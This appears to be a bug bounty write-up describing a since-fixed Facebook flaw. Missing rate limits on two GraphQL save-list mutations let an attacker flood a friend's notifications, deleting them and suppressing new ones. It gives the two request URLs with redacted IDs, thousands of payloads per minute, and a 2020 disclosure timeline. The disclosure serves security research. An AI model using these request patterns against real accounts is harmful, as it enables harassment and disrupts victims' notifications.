[Facebook] Deleting Friends Notifications and preventing new Notifications
By exploiting missing rate limits on two GraphQL requests and performing an attack in a manner, it was possible to delete any friend's notifications and even prevent the new one's coming in.
Similar issue reported by me - click here
POC -
Rate Limit Evaluation -
These both requests could have been make with more than 4000 payloads. This was taking less than a minute.
There was no silent blocking because after the 3000th payload, victim was still hunged and the response was giving a success result. The response length didn't differ throughout the bruteforce attack.
Both requests should be made simultaneously.
Request 1 -
https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=2501557149952408&variables={"input":{"client_mutation_id":"10","actor_id":"XXX","participant_ids":["XXX"],"content_collection_id":"XXX","role":"CONTRIBUTOR","save_mechanism":"ADD_BUTTON","save_surface":"SAVE_LIST_COLLABORATORS_ADD_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}
Request 2 -
https://developers.facebook.com/tools/explorer/?method=POST&path=graphql&version=v3.2&doc_id=3163221407084978&variables={"input":{"client_mutation_id":"11","actor_id":"XXX","content_collection_id":"2157516397876473","save_mechanism":"REMOVE_FROM_SAVED_LIST_BUTTON","participant_ids":["XXX"],"save_surface":"SAVE_LIST_COLLABORATORS_VIEW"},"scale":1,"useCase":"SAVE_DEFAULT"}
Timeline -
Reported - Friday, January 3, 2020
Triaged - Friday, January 17, 2020
Rewarded - Wednesday, February 19, 2020
Fixed - Tuesday, March 31, 2020